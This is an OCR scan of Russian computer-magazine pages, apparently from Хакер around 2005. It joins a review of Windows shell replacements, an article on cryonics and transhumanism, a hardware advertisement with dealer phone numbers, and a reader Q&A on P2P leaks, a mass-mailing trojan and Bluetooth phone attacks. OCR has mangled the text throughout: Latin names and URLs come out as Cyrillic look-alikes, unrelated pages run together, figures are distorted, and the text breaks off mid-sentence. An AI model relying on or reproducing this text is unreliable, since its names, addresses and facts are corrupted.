его сначала на ср1251, а затем и на юникод, но это беду о панелью задач 
так и не поправило. Плюнул. Рассматриваю дальше. По правой кнопке мы- 
ши, как повелось, появляется меню, но в нем можно только вызвать свой- 
ства монитора, панель управления или выключить компьютер — все ос- 
тальное появляется по левой кнопке мыши, что меня слегка удивило. А поп- 
робуйте угадать, где располагается панель задач? Кто сказал — нет ее? 














Есть. Сверху! Правильно! Опять сверху! Вероятно, все разработчики пыта- 
ются сделать что-то выдающееся, что в своем стремлении оказываются 
ужасно предсказуемыми. Ну, вот была панель снизу — нет, мы ее сделаем 
сверху, ведь в Эксплорере сверху ничего не висит, а у нас будет... Ну да 
ладно... Вот в этом шелле точно можно забыть о ярлыках: здесь нет воз- 
можности их создать. И панели перемещать тоже невозможно, зато есть у 
серенады и свои фишки — например, слева внизу я наблюдал индикатор 
загруженности процессора. Общее впечатление у меня составилось не 
лучшее: в оперативке этот шелл занимает относительно много места (око- 
ло 8600 Кб), но работает быстро и безглючно. А вот функциональности ИМ- 
ХО у него маловато. Те же индикаторы без особых проблем можешь пос- 
тавить на рабочий стол, используя программу Затигіге. 

[Ношегсіевк — парящий десктоп] Итак, прошу любить и жаловать: 
Ноѵѵегсіезк. Непременно загляните на их сайт. По словам разработчиков, 
они могут предложить вам более 200 тем для этого шелла. Сам я, правда, 
по техническим причинам проверить это не смог, потому что скорость мо- 
демки того не позволяет, да и вас расстраивать не хотелось — на вкус и 
цвет товарищей нет ;). А еще у них раздел загрузки тем не готов. Еще хо- 
телось бы упомянуть о таких возможностях, как: интегрированный в шелл 
датчик системных ресурсов, конфигурируемое системное меню, медиа- 
плеер и консольные утилиты, продвинутые часы и еще Бог знает какие на- 
вороты, но опять же, по заявлениям разработчиков. Установился он без 
проблем, причем как на ѴѴІпбоѵѵз ХР, так и на ѴѴІпсІоѵѵз 2003 Зегѵег. Могу 
тебя заверить, что привыкать к этому новшеству ты будешь долго, но оно 
того стоит. Вместе с установочным пакетом идут три темы: Оіпкз, 
ЗітрІеЗІи?^ и ОІпга. Я стопудово уверен, что ты найдешь себе подходящую, 
если не из стандартных, то на сайте девелоперов точно. Описывать этот 
шелл, исходя из внешнего вида, не имеет смысла, что, впрочем, примени- 
мо ко всем платным продуктам (и к Азіоп тоже, хотя его я описал в прош- 
лой статье), ведь программеры за это деньги получают, а следовательно, 
потрудились на славу. Ну так вот: расскажу лучше о фичах этого шелла и 
его недостатках. В оперативной памяти у меня этот шелл разложился на 
9568 Кб. Для сравнения: ехріогег — порядка 16 Мб. Обещанный датчик 
системных ресурсов не оправдал моих ожиданий: здесь только график 








загруженности СРУ, объем физической и виртуальной памяти. А я-то 
ждал прибамбасов вроде ЗреесІРип. Есть здесь и менеджер нескольких 
рабочих столов. По умолчанию их 4 штуки. Стоит заметить, что кроме ло- 
кального времени, стандартные темы показывают еще и временные зоны 
других стран. Возможно, это будет удобно гикам, которые много путеше- 
ствуют, или челам, которые много общаются с иностранцами. Лично мне 
это показалось лишним. Мепи Ебііог этого шелла тоже стоящий. Поставь 
себе его, и убедись во всех прелестях сам. Да, и не забудь скачать допол- 
нительные темы — они обязательно тебе понравятся. 

[ѴѴіпзрер Ьу 8Іер — пока от монитора не ослеп] Следующий инди- 
вид, точнее представитель, а впрочем, называйте, как хотите, от этого его 
ценность не меняется. ѴѴІпзІер — по большому счету, это не зііеіі-геріасе- 
тепі, а набор утилит, среди которых: 

МехІЗІаП — замена многострадального пуска, системного трея и панели задач. 
ѴѴогкЗІіеІІ — собственно, замена рабочего стола. 

РоШ Вгоѵѵзег — чрезвычайно удобная утилита конфигурирования шрифтов. 
Вот как-то так... А в конечном итоге, учитывая их интегрированность, по- 
лучаем збеіі-елітапсег (ѴѴІпзІер работает о ехріогег'ом, а не является его 
полноценной заменой). Может это и удобнее, ведь ты можешь установить 
все это по частям и да будет тебе счастье, я же скачал іиІІ-раск, и буду 
разглядывать сейчас его поближе по полной панораме. Постараюсь сразу 
предупредить о проблемах, которые могут возникнуть при установке. ѴѴІпзрер 
написан на ѴізиаІ Вазіс 5, следовательно, и в системе у тебя он должен 
быть прописан. Если у тебя в системной директории нет динамических 
библиотек МзѵЬѵтбО.сіІІ, ОІеаи132.сІІІ, 01ерго32.с111, 8Мо1е2.11Ь, АзусІІІІ.сіІІ и 
СотсаІ.сіІІ, то тебе прямая дорога на ѵѵіпбоѵѵз ырсіаіе. Больше проблем воз- 
никнуть не должно. Теперь обо всем понемногу. Начну с плохого: в меню, 
за которое отвечает компонент НехІЗТАНТ, некорректно отображаются 
русские символы — так что придется все переименовывать по-английски. 
Из хорошего: в стандартной поставке около десяти тем, причем достаточ- 
но приятных взгляду. Стоит отметить плагин погоды, часы, которые мож- 
но разместить в любом месте экрана, СРП теіег на рабочем столе, меню 
настройки о кучей возможностей и, пожалуй, с вас хватит. Хочешь, чтобы 
ѴѴІпзІер запускался автоматически? Открывай вкладку ѲіоЬаі Ргеіегепсез 
и ставь галку «Пип ѴѴогкЗітеіІ оп Зіагіир». Если возникнут какие-то вопро- 
сы — не спеши писать мне, лучше загляни в ііеір и РАО. Там много чего 
интересного говорят :). 

[Азіоп зИеІІ] Вот и чемпион моего беспристрастного обзора. Этот шелл 
имеет всего один недостаток: он платный. Я думаю, что тебя не стоит учить, 
как справиться с этой бедой? Что? Кто сказал покрякать с азіаіаѵізіа'й? 
Ууу!!! Какое бе-зо-бра-зи-е! Крякать будешь с утками в озере :). Безуслов- 
но, купить за свои кровные! ;) Опять же, начнем с установки (а что, есть 
другие варианты? ;)). Определяем Азіоп шеллом по умолчанию, потом вы- 
бираем, будет ли доступна для себя или для всех эта оболочка (пусть млад- 
ший братик порадуется :)). Если ты ставишь Азіоп на машину о 9х виндой 
(а разве остались еще такие мамонты?), и тем более, если у тебя Ишак 
версии З.Х (в чем я еще в большей степени сомневаюсь), то не забудь от- 
метить соответствующую галочку, а то Азіоп тебя обложит матом при за- 
пуске :). Если ты не собираешься расставаться о наследием винды, то бишь 
ехріогег'ом, а хочешь просто посмотреть на этот шелл, то советую поста- 
вить продвинутый свитчер збеіі'ов — 8ИеіІ 8\л/аррег, который позволит пе- 
реключаться между шеллами и их режимами запуска. В стандартной пос- 
тавке есть 4 темы: Ариа, АзІопХР, Азіоп 1.9.1 и Азіоп Оезкіор, хотя на са- 
мом деле это даже больше чем просто темы. Но обо всем по порядку. На 
первый взгляд этот шелл трудно отличить от красиво настроенного ехріог- 
ег'а, но главная фишка этого шелла в рабочем столе, а точнее в возмож- 
ностях его настройки. Рабочий стол теперь для тебя не просто свалка яр- 
лыков — это полнофункциональный рабочий инструмент, а любой объект 
на нем (ярлыком назвать это язык не поворачивается) дает просто огром- 
ное пространство для творчества. Соответственно, тема — это еще и набор 
предустановок ярлыков рабочего стола. Есть еще в астоне выезжающая 
панель, сделанная по образу и подобию аналогичной в Мас08 X, но по 
большому счету это простой контейнер ярлыков. Мелочь, а приятно :). Да- 
же кнопка ѴѴІпКеу здесь работает должным образом. 

[Р.8/2] Про ѴѴІпсІоѵѵз собе пате Еопдітогп (который, возможно, сменит имя — 
прим. Лозовского) слышал? Хочешь увидеть его сейчас, не устанавливая 
кривые билды? Тогда ищи на дисках журнала ЕопдІюгпТгапзІогглаІіопРаск. 
А вот, скажем, захотелось тебе трехмерности на рабочем столе. Тогда 
ставь 8р!іеге ХР. За ним я тебя снова отправляю на диск журнала. Это ведь 
тоже 81іеіі-еп1іапсегы, а следовательно, будут интересны всем, кто взялся 
за нелегкое дело — стайлинг и тюнинг винды. Ну вот, пожалуй, и все, хотя 
вот еще что: не воспринимайте мои восхищения и перлы как политзаказ 
разработчиков платных продуктов: просто их программы действительно то- 
го стоят. Удачи @ 



ѴѴІпзІер - красиво, не правда ли? 
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038 

Технологии 

бессмертия 

по ОПРЕДЕЛЕНИЮ, ТРАНСЧЕЛОВЕКОМ СЕБЯ 
ОЩУЩАЕТ ТОТ, КТО ДОСТАТОЧНО ИНФОРМИ- 
РОВАН, ЧТОБЫ УВИДЕТЬ В БУДУЩЕМ КАРДИ- 
НАЛЬНО НОВЫЕ ВОЗМОЖНОСТИ, УЖЕ СЕГОД- 
НЯ ГОТОВИТСЯ к ним и ИСПОЛЬЗУЕТ ВСЕ 
СУЩЕСТВУЮЩИЕ ИНСТРУМЕНТЫ ДЛЯ САМО- 
СОВЕРШЕНСТВОВАНИЯ. НАРЯДУ С ИСКУС- 
СТВЕННЫМ ИНТЕЛЛЕКТОМ, КИБОРГИЗАЦИЕЙ 
И НАНОТЕХНОЛОГИЯМИ, ТРАНСГУМАНИЗМ 
ОПИРАЕТСЯ НА ДОСТИЖЕНИЯ НАУЧНОГО ИМ- 
МОРТАЛИЗМА — УЧЕНИЯ О ЕСТЕСТВЕННОНА- 
УЧНЫХ СПОСОБАХ ПРАКТИЧЕСКИ БЕСКОНЕЧ- 
НОГО ПРОДЛЕНИЯ ЖИЗНИ. НЕ ВДАВАЯСЬ В 
СПОРНЫЕ ВОПРОСЫ ФИЛОСОФИИ, МЫ ПОГО- 
ВОРИМ СЕГОДНЯ о ТЕХНОЛОГИЯХ БЕССМЕР- 
ТИЯ I Алекс Целых (есІііог@1есІіпеѵѵз,ги), Слава Ансимов (апзі@таі!.ги) 

Крионика и другие 
стимуляторы жизни 




По убеждению большинства имморталистов, са- 
мым реалистичным шагом к бессмертию является 
крионика. По всем прогнозам, реализация любых 
других способов продления жизни, включая ген- 
ную инженерию, молекулярную медицину и сов- 
сем уж фантастический перенос человеческой 
личности на компьютерные носители («загрузку»), 
займет еще не один десяток лет. Крионика, или 
криостаз, то есть консервация людей путем их за- 
мораживания до ультранизких криогенных темпе- 
ратур, не претендует на роль «элексира жизни». 
Она лишь способствует изготовлению «твердой 
копии» человеческого тела с целью его оживле- 
ния при помощи медицинских технологий будуще- 
го. Сторонники криостаза не отрицают, что спосо- 
бов возвращения замороженных пациентов к жиз- 
ни пока не существует. Однако уже очевидно, что 
технологиями размораживания, оживления и «ре- 
монта» клеток и тканей на молекулярном уровне 
будут нанотехнологии. И неважно, когда они ста- 
нут доступными. Своего часа крионика готова 
ждать и десять, и сто, и тысячу лет. Как говорят 
сторонники криостаза, он является единственным 
научным методом, который прямо сейчас дает че- 
ловеку шанс (пусть и мизерный) на личное бес- 
смертие в будущем. 

[наука] Биологическая подоплека крионики та- 
кова. Традиционная медицина, поборовшая кли- 
ническую смерть, почти готова признать, что не- 
которое довольно продолжительное время после 
биологической смерти человека многие клетки 



его мозга еще живы и сохраняют информацию о нем как о личности. Еще, 
как минимум, на несколько часов индивидуальность человека можно за- 
фиксировать в виде «снимка» структуры связей между нейронами головно- 
го мозга. И лишь исчезновение этой информации будет означать информа- 
ционную и окончательную смерть человека. В пользу такого предположе- 
ния говорит тот факт, что даже тяжелые мозговые травмы не приводят к 
полной потере человеком своей личности. То есть, сохранения общей 
структуры мозга даже «с потерей качества» может быть вполне достаточ- 
но для воссоздания в будущем точной копии замороженного человека. 

[технология] Отсюда технологический процесс криобальзамирования 
выглядит следующим образом. Кровь заменяется на специальный кровеза- 
менитель, устойчивый к низким температурам (например, глицерин). Ткани 
насыщаются химическим раствором криопротектора, уменьшающего их 
повреждения при глубоком замораживании. После этого начинается мед- 
ленное равномерное охлаждение тела. Его перевозят в специальное храни- 
лище, где головой вниз помещают в криостат — большой металлический 
термос, наполненный жидким азотом при температуре 196 градусов по 
Цельсию. В таком виде тело не будет подвержено изменениям неопреде- 
ленно долго. Необычная поза обусловлена тем, что азот быстро испаряется 
и его нужно постоянно подливать. Даже если в этом строгом технологичес- 
ком процессе произойдет сбой, мозг пациента еще некоторое время будет 
защищен. По сути, сохранения одного мозга уже вполне достаточно, чтобы 
достичь конечной цели криостаза. Криобальзамирование «головы профес- 
сора Доуэля», отделенной от тела, получило название «нейроконсервация». 
В трансплантологии достаточно давно практикуется замораживание спермы, 
яйцеклеток, костного мозга, кожи и роговицы глаза. Первые эксперименты 
по замораживанию небольших фрагментов мозга взрослого человека пока- 
зали, что при оттаивании «серое вещество» проявляет электрическую актив- 
ность. Вообще, небольшие биологические объекты при обработке криопро- 
текторами легко переносят замораживание. Организмы некоторых насеко- 
мых и животных даже самостоятельно вырабатывают природные криопро- 
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«ремонта» чревато его гибелью. 
Впрочем, электрофотосъемка пока- 
зала, что повреждения обычно мини- 
мальны и не являются необратимы- 
ми. Современные исследования ве- 
дутся в двух направлениях: разра- 
ботка универсальных синтетических 
криопротекторов (сегодня их эффек- 
тивность достигает 85%) и создание 
алгоритмов для воссоздания моле- 
кулярными роботами целостной 
структуры из разрушенной при замо- 
розке. Природным аналогом такого 
алгоритма является «программа» 
рибосомы в виде молекулы рибонук- 
леиновой кислоты, в соответствии о 
которой из аминокислот конструиру- 
ется молекула белка. 




Веб-сайты о крионике и 

трансгуманизме: 

Шр://шшѵі.стуопісз.огд/ 

Шр://ш\л/ш.аІсот.огд/ 

Шр://стуопісв.4и.ги/ 

Шр://шшш.еІегпаІтіпб.ги/ 




Р. Зттинджер. Перспектива 
бессмертия — бПрУ/ш\л/.сгу- 
опісз.отд/боок1 .біті 
Д. Халперин. Первый бес- 
смертный — бйр-У/шш.бет- 
Падесоіпв.сотШ 
Журнал «Крионика» (вы- 
ходит с 1982 года) — 
бПр://шшш.аІсог.огд/Стуопі 
свМадаше 
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Фильм «Замороженный 
калифорниец» назвали так 
потому, что первое в исто- 
рии замораживание чело- 
века осуществило в 1967 
году Калифорнийское кри- 
оническое общество. 



«Ремонтировать» клетки и возвра- 
щать органы к жизни, скорее всего, 
будут «молекулярные хирурги» — 
наноманипуляторы (подробнее о на- 
нотехнологиях читай в Хакере 
07/2004 и 01/2005). В забальзамиро- 
ванное тело запустят миллионы мил- 
лиардов наноботов общим весом около 500 граммов. При помощи миниатюр- 
ных вычислительных устройств они проанализируют повреждения, возникшие 
во время смерти, на этапе криобальзамирования и хранения. После этого за- 
кипит настоящая работа. Перемещая молекулы и модифицируя их структуру, 
наноманипуляторы будут восстанавливать клеточные мембраны и органеллы, 
соединять разорванные участки оболочки клетки, разрезать сшивки внутри и 
между молекулами, удалять вредные продукты обмена и корректировать гене- 
тический материал. Такой «капремонт» подразумевает лечение и оздоровле- 
ние клетки, то есть воссоздание ее в омоложенном виде. В результате, будут 
излечены болезни, которые явились причиной смерти человека, включая рак 
или СПИД. Вернутся к жизни и те пациенты, которые погибли в результате нес- 
частного случая или убийства. Такая процедура реанимации может занять до 
нескольких месяцев. После чего нанороботы покинут организм, как обычный 
вирус гриппа, — через мочу, кровеносную систему или дыхательные пути. 




знаменитый криостат Оеѵѵаг 
в лаборатории АІсог 





Ходят слухи, что в числе 
замороженных могут 
быть Уолт Дисней и 
Сальвадор Дали. 

Любопытно, что многие 
ведущие специалисты в 
области искусственного 
интеллекта и нанотехноло- 
гий являются имморталис- 
тами. Контракт на замора- 
живание имеют Марвин 
Минский, ЭрикДрекслер, 
Ральф Меркль и другие 
отцы хай-тека. 



текторы — сахар и глюкозу. Сегодня 
ученые решают задачу по заморажи- 
ванию больших орга- 
нов и биологических 
объектов. Неоднород- 
ность их структуры не 
позволяет качественно 
обработать ткани кри- 
опротекторами и обес- 
печить равномерное за- 
мораживание. В ре- 
зультате, биологичес- 
кие структуры частично 
разрушаются. Реани- 
мировать такой орган 
без предварительного 



[бизнес] Сегодня услуги крионических депозитариев (криоториев) предла- 
гают, в общей сложности, пять компаний: АІсог в Аризоне, Институт криони- 
ки в Детройте, СгуоСаге Роипбаііоп, Американское крионическое общество и 
корпорация ТгапзТіте в Калифорнии. В капсулах криостатов — по четыре 
замороженных тела в каждой — находятся, по разным подсчетам, от 100 до 
200 пионеров крионики. Еще до 2,000 стоят в очереди на заморозку. Ежегод- 
но это число растет на 200 — 300 человек. Как правило, при этом заключает- 
ся договор на криостаз и человек становится членом организации, выплачи- 
вая ежегодные членские взносы. Стоимость самой процедуры по заморажи- 
ванию составляет от 30 до 150 тысяч долларов. Столь высокая цена обус- 
ловлена бессрочным характером контракта и целым комплексом мер по 
предотвращению преждевременного размораживания, включая резервные 
емкости для азота и аварийные дизель-генераторы. Обычно на всю сумму 
оформляется страховка на случай смерти. В итоге, страховые взносы для 
молодого человека не превышают 1000 долларов в год. Когда клиент будет 
находиться в критическом состоянии между жизнью и смертью, на пульт кри- 
онического депозитария через родственников, лечащих врачей или медици- 
нские датчики поступит сообщение, получив которое бригада специалистов 
сразу выедет на место. Как только врач подпишет свидетельство о смерти, 
начнется подготовка тела к замораживанию. Дальнейшую историю ты уже 
знаешь. По условиям договора, тело будет храниться в криостате до появле- 
ния в будущем технологии, которая позволит его реанимировать. Для покры- 




здание криотория АІсог в штате Аризона, США 
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I РАЗМОРОЖЕННЫЕ I 

С 1967 по 80-е годы в мире было заморожено всего 20 чело- 
век. На конец 90-х существовало уже около 20 крионических 
обществ в Америке, Западной Европе и Австралии. Однако 
несколько лет назад практически все пациенты были разморо- 
жены. По одной версии, была нарушена технология хранения. 
По другой — криотории банально обанкротились, потому что 
родственники пациентов одни за другими перестали оплачи- 
вать их пребывание в замороженном состоянии. Большую 
часть тел передали в АІсог и Институт крионики. Некоторых 
пришлось разморозить и захоронить. После того, как в апреле 
2004 компания СгуоЗрап перевела 10 «леденцов» в детрой- 
тский криоторий, в мире фактически остались лишь две упо- 
мянутые выше «цитадели продления жизни». Причем, нейрок- 
риосервис пока практикует один АІсог. 



тия расходов на обслуживание тела часть уплаченной суммы помещается в 
банк под проценты, что позволяет хранить тело неограниченно долго, а пос- 
ле «воскрешения» клиента вручить ему кругленькую сумму денег. Прибега- 
ют в крионике еще и к такому юридическому трюку. Чтобы размороженный 
клиент, на которого в свое время пришла «похоронка», мог вернуться к пол- 
ноценной жизни, ему рекомендуют перевести деньги в траст, например, в 
Швейцарии. По закону, никто, кроме самого владельца траста, не может 
предъявить права на деньги и недвижимость. Причем, с юридической точки 
зрения, факт смерти не носит принципиального характера. 

[русский след] Уже два года московский Институт биомедицинских тех- 
нологий и детройтский Институт крионики просят откликнуться всех жела- 
ющих принять участие в основании первой в России крионической компа- 
нии. У нас предполагается проводить обработку клеток криопротекторами 
и осуществлять предварительное охлаждение до температуры сухого льда. 
После этого тело будет переправляться на хранение в Институт крионики в 
Штатах. Помимо растущего спроса на услугу, интерес к России определя- 
ется еще и потребностью в свежих человеческих трупах при относительной 
простоте получения лицензии на медицинские эксперименты. Вообще го- 
воря, эксперименты по криогенному замораживанию живых людей офици- 
ально запрещены. Однако, компании настаивают на том, что пациентов же- 
лательно ввести в состояние анабиоза до того, как болезнь приведет к их 
смерти. Возможно, когда эффективность крионики будет подтверждена, 
запрет отменят. Пока у криоториев весьма непростое отношение с властя- 
ми. В августе 2003 года Институт крионики в Детройте чуть было не закры- 
ли. Владельцам компании пришлось срочно лицензировать свою деятель- 
ность под вывеской кладбища. Теперь процедуру витрификации, подготов- 
ки тела к замораживанию, могут осуществлять только приглашенные коро- 
неры. Также образованы компании, занимающиеся исключительно транс- 
портировкой тел в криотории. Ранее обсуждался проект строительства в 
Подмосковье «криофермы», оснащенной оборудованием для хранения тел 
и установками для производства жидкого азота. При ферме планировалась 
коммуна, где в качестве волонтеров работали бы еще живые, готовящиеся 
к смерти люди. Это исключило бы затраты на доставку тела в криоторий и 
помогло реально скостить стоимость процедуры криостаза. По скрупулез- 
ным расчетам российской бизнес-прессы, создание ультрасовременного 
криотория в России обойдется в 200 — 300 тысяч долларов, включая мощ- 
ный информационный пиар. 



«Русская мафия» всегда двигала крионику. Достаточно оказать, что отцом 
крионики является профессор физики Роберт Эттинджер, автор романа- 
бестселлера «Перспектива бессмертия» и до недавнего времени директор 
Института крионики в Детройте. По материнской линии он выходец из Рос- 
сии. Примерно за полвека до Эттинджера русский биофизик Бахметьев 
впервые экспериментально доказал, что млекопитающие могут переносить 
охлаждение до температуре ниже нуля по Цельсию, и высказал идею о том, 
что позже назвали крионикой. Сегодня директором по науке Института 
крионики, лично разработавшим самые совершенные криопротекторы в 
мире, является Юрий Пичугин, в прошлом сотрудник Харьковского инсти- 
тута проблем криобиологии и криомедицины. Его по праву считают учени- 
ком знаменитого русского космиста Николая Федорова. За границей живет 
и работает обладатель премии Г еронтологического общества РАН за ис- 
следования в области криобиологии в 1999 году Михаил Соловьев. Разви- 
вают идеи крионики ведущий сотрудник Массачусетского технологическо- 
го института Андрей Барковский и директор московского Института биоме- 
дицинских технологий Игорь Артюхов. Великим трасгуманистом-теорети- 
ком современности был футуролог и специалист по искусственному интел- 
лекту Саша Численко, которого я имел счастье знать лично. 




[заключение] Около половины заявок на замораживание поступает в кри- 
отории в самый последний момент от родственников, которые никак не могут 
принять расставание с близкими. Поэтому крионика — это, конечно, при- 
быльный бизнес, бизнес на смерти. Однако истинными ценителями филосо- 
фии трансгуманизма и сторонниками криостаза, как правило, являются пос- 
ледовательные неординарные личности, которые полны оптимизма и твор- 
ческих сил, любят жизнь и хотят жить как можно дольше. С развитием ОМРІ- 
технологий — по Биллу Джою к ним относятся генная инженерия, нанотехно- 
логии и робототехника — число трансгуманистов на планете будет расти в ге- 
ометрической прогрессии. Войдешь 
ты в их число или нет, теперь зависит 
только от твоего мироощущения @ 





I ПОБЕДА НАД СМЕРТЬЮ I 

Судя по новостям, хай-тек бросил смерти вызов. 

Как минимум, две компании — американская ІІІеОет 
(ѵѵѵѵѵѵ.ІІІедет.сот) и швейцарская АІдогбапга (ѵѵѵѵѵѵ.аідогбап- 
2 а. сб) — предоставляют услуги по изготовлению бриллиантов 
из пепла, оставшегося после кремации человека. Первая ком- 
пания добавляет минералы, что позволяет получать алмазы 
разных цветовых оттенков — голубого, красного, желтого. 
Вторая утверждает, что только ее продукция не является «ге- 
нетически модифицированной» и на 100% состоит из пепла. 
Стоимость первоклассного алмаза весом от 0,2 до 1 карата 
составляет от 2,700 до 20,000 долларов. Кстати, патент на тех- 
нологию принадлежит нашим соотечественникам. 

Один немец продает устройство «Телефонный ангел» 
(Мф://ѵѵѵѵт.(еІе(опепдеІ.сІе/) — радиосвязь с умершим. Голос 



раздается под землей из громкоговорителя, встроенного в 
кофр. Видимо, еще при жизни у покойника будет трепетное 
ощущение счастья от того, что его теща будет доставать его 
по телефону после смерти. 

На фестивале НехІРезІ 2005, который состоялся в июне, 
предстала андроидная копия американского писателя-фантас- 
та Филиппа Дика («Бегущий по лезвию бритвы», «Особое 
мнение», «Вспомнить все» и др.), который умер еще в 1982 го- 
ду. Робот Рбііір К. Оіск 

(Шр'МапзопгоЬоіісз.сот/ргоіесІ _р/сс/.рйр) не просто похож на 
Дика и реалистично синтезирует его голос. Используя тексты 
произведений и мемуаров, он изучил мнение писателя по мно- 
гим современным вопросам и бросает оригинальные реплики. 
А по адресу б1(р://(питрбрс.сот/]обп1еппоп/ в интернете распо- 
лагается проект искусственного интеллекта Джона Леннона. 





РОХСОПП* 

Асіѵапсіпд ТИгоидИ Іппоѵаііоп 

Наследие тысячелетий 

в технологиях будущего. 



ѵѵѵ/ѵѵ.і'охсоппсііаппеі.сопп 

\ѵѵ/ѵ7.'Гохсопп.т 

- торговая 

марка Ноп Наі Ргесізіоп 
Іпсіизіігу Со., Исі - мирового лиде- 
ра в области высокотехнологичных 
решений. Рохсопп - крупнейшая частная 
тайваньская компания, №1 в мире по ОЕМ- 
гшітавкам системных плат, разъемов и 
^ корпусов для ПК, №2 в мире по выпуску 
систем охлаждения. В 2004 году объем 
ИР^ продаж компании превысил $16 млрд. 

Кол ичество сотрудников, занятых на і 
предприятиях Рохсопп | 
по всем странам ! 
мира, более / 
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Чипсет пѴЮІА МР4 ІЛіга; 

БоскеС 939 для АМО АШІоп™ 64/64РХ СРУ; 

Р5В 2000 МТ/5, НурегТгапБрогІ:™; 
до 4СВ Оиаі сМаппеІ ООК400/ООКЗЗЗ/ООК266; 
1 X РСІеХІб, 2х РСІеХІ, 4х РСІ; 
4х5егіаІАТАІІ (КАЮ 0, 1, 0+1); 

Аисііо 7.1, АС97; СЬЕ 1_АМ, ІЕЕЕ 1394а; 
до 8 портов У5В 2.0 
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Собственное производство высококачественной стали • Лицевые панели изготовлены в соответствии со стандартами ведущих мировых производителей 
Легендарные блоки питания Р$Р, НіРго, С\^Т • Сборка ПК без использования инструмента во всех моделях корпусов 
Дополнительные вентиляторы и УБВ панели в базовой конфигурации • Более 100 моделей во всех ценовых категориях 
Широкий ассортимент вентиляторов для процессоров АМО и Іпіеі 



Москва: Ргопеідгоир - (095) 789-3846; УІІга Сотриіегз - (095) 775-7566: Инкотрейд - (095) 785-8659; Кит - (095) 777-6655; Компьютадор - (095) 274-7300; НИКС - (095) 974-3333; Полярис - (095) 755-5557 
Альметьевск: Компьютерный мир - (8553) 25-38-29; Волгоград: ЮКК МТ - (8442) 49-19-20; Краснодар: Игрек - (8612) 210-98-50; Красноярск: КАПИТАЛ-СЕРВИС - (3912) 63-60-30; Курск: КомпьюЛэнд - (0712) 56-46-43 
Курчатов; КомпьюЛэнд - (07131) 2-31-22; Липецк: Регард - (0742) 22-13-09; Набережные Челны: КЦ "Мехі сотриіег" - (8552) 39-03-38; Нижнекамск; КЦ "Мехі сотриіег" - (8555) 43-79-82; Нижний Новгород: АйТиОн - (8312) 74-85-90 
ВИСТ-НН 000 - (8312) 78-48-78; Ником-Медиа (8312) 34-11-34; ЮСТ - (8312) 30-16-74; Новосибирск: ЗЕТ ИСК - (3832) 125-142; Новый Уренгой: Все для офиса - (34949) 5-55-55; Омск: ТНТ 000 - (3812) 36-82-42 
Электронный рай - (3812) 51-04-04; Рязань: УІІга - (0912) 205-205; Самара; Прагма - (8462) 16-32-87; Саратов: АТТО - (8452) 444-111; Томск; Стек - (3822) 554-554; Улан-Удэ: Снежный Барс - (3012) 43-00-00, 43-55-15 
Хабаровск: Диалог Плюс - (4212) 50-37-06; Дальком - (4212) - 42-86-72; Челябинск: Алиас - (3512) 37-8717; Чита: Вавилон - (3022) 32-55-00. 
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Тринити Лоджик 

ѵѵѵѵѵѵ.Ц-с.ги 







ЮНИТЫ КРЕАТИФФ КОДИНГ УМІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20МЕ РЕРВУМ НЬЮСЫ 



БУДЬ КОНКРЕТНЫМ И ЗАДАВАЙ КОНКРЕТНЫЕ ВОПРО- 
СЫ! СТАРАЙСЯ ОФОРМИТЬ СВОЮ ПРОБЛЕМУ ТАК, ЧТО- 
БЫ Я СМОГ ДЕЙСТВИТЕЛЬНО ПОМОЧЬ ТЕБЕ СОВЕТОМ, 
УКАЗАТЬ НА ВОЗМОЖНЫЕ ОШИБКИ. ОСТЕРЕГАЙСЯ ОБ- 



ЩИХ ВОПРОСОВ ВРОДЕ «КАК ВЗЛОМАТЬ ИНТЕРНЕТ?», 
ТЫ ЛИШЬ ПОТРАТИШЬ СВОЙ ПОЧТОВЫЙ ТРАФИК. 
ТРЯСТИ из МЕНЯ ФРИШКИ (ИНЕТ, ШЕЛЛЫ, КАРТЫ) — НЕ 
СТОИТ, Я САМ ЖИВУ НА ГУМАНИТАРНУЮ ПОМОЩЬ! 



РАОСОММЕНТЗ 

ЗИеХ 

(Иаск-Іад @ геаі. хакер. ги) 



О: Почему государственным работникам скоро запретят пользоваться Р2Р? 
А: Государство, как и любой частный узурпатор, не хочет оплачивать гига- 
байты удовольствий, которые сдувают работнички из Сети. Также оно хо- 
чет, чтобы трудяги были постоянно заняты, а не погружались в праздность 
Р2Р. Но основная проблема, которая стоит сейчас очень остро, — это защи- 
та данных. Нередко государственные служащие криво настраивают своих 
р2р-клиентов, расшаривая кучу секретных документов на всю Сеть. Другая 
сложность относится к новомодным вирусам, которые начинают распрост- 
ранение содержимого «Моих документов» жертвы после заражения. По 
первой теме попалился один чувак из Пентагона, выбросив в Сеть чертежи 
некого супер-засекреченного синхрофазотрона. Во втором случае залетел 
японский чиновник, у которого вирус попер материалы ядерных разработок, 
которые потом были выброшены на бескрайние просторы Кагаа и еОопкеу. 

О: Меня пугают эпидемией какого-то нового трояна ѲІіесІег'а. 

Что известно об этом? 

А: Говорить об эпидемии пока не приходится, заражений глобального 
масштаба замечено не было. Пытаться найти информацию по этой зара- 



темы и использованием надлежащего софта стало возможным совершать 
и другие грехи — устанавливать переадресацию звонков, выводить теле- 
фон в интернет, переводить мобилу от одного оператора к другому (обык- 
новенно реализуется с телефонами на роуминге). Стоит помнить, что в 
нормальных условиях атакующему нужно находиться на расстоянии не бо- 
лее 10 — 15 метров от жертвы. Однако с использованием специальной 
ВІие1оо(1і-«винтовки», то есть направленной антенны (мачты), расстояние 
может быть увеличено вплоть до полутора километров. Более подробно о 
ЫиеЬид'е можно почитать на Ігіііпііе.огд. Понятно, что не все ВТ-агрегаты 
станут жертвами хакерюг, но множество телефонов, особенно 2 — 4 лет 
давности выпуска будут опрокинуты на лопатки. Со списком бажных тру- 
бок можно ознакомится на ттт.НіеЬипкег.пеІ/геІеаве-ЫиезіитЫегМт. Те- 
ма безопасности ВТ становится все более актуальной: за весь прошлый 
год было продано больше 100 миллионов ЫиеІооІР-девайсов, а за первое 
полугодие этого — 80 миллионов. 

О: Нарыл ипіх-зііеіі, установил ЗесигеСРІТ, но беда в том, что в мануале к 
нему ничего не написано о командах для управления шеллом :(. 






зе, вбивая имя «ОІІебег» в поисковики, — занятие неблагодарное, потому 
что в большинстве вирусных баз, вроде Зесигііу Незропзе {ѵ\/\л/\А/.вутап- 
іес.сот/аѵсепіег/ѵіпіодЬ.ЫтІ) он проходит под именем Тоозо. Описание за- 
разы в базах — предельно скудно, так что для детального ознакомления о 
образцом мне пришлось заразить одну из подконтрольных машин. Суще- 
ствуют несколько версий вируса, но действуют все три примерно одинако- 
во. Распространившись массовой е-таіі рассылкой, запущенный троян 
окачивает другую программу, которая успешно вырубает антивирусы, 
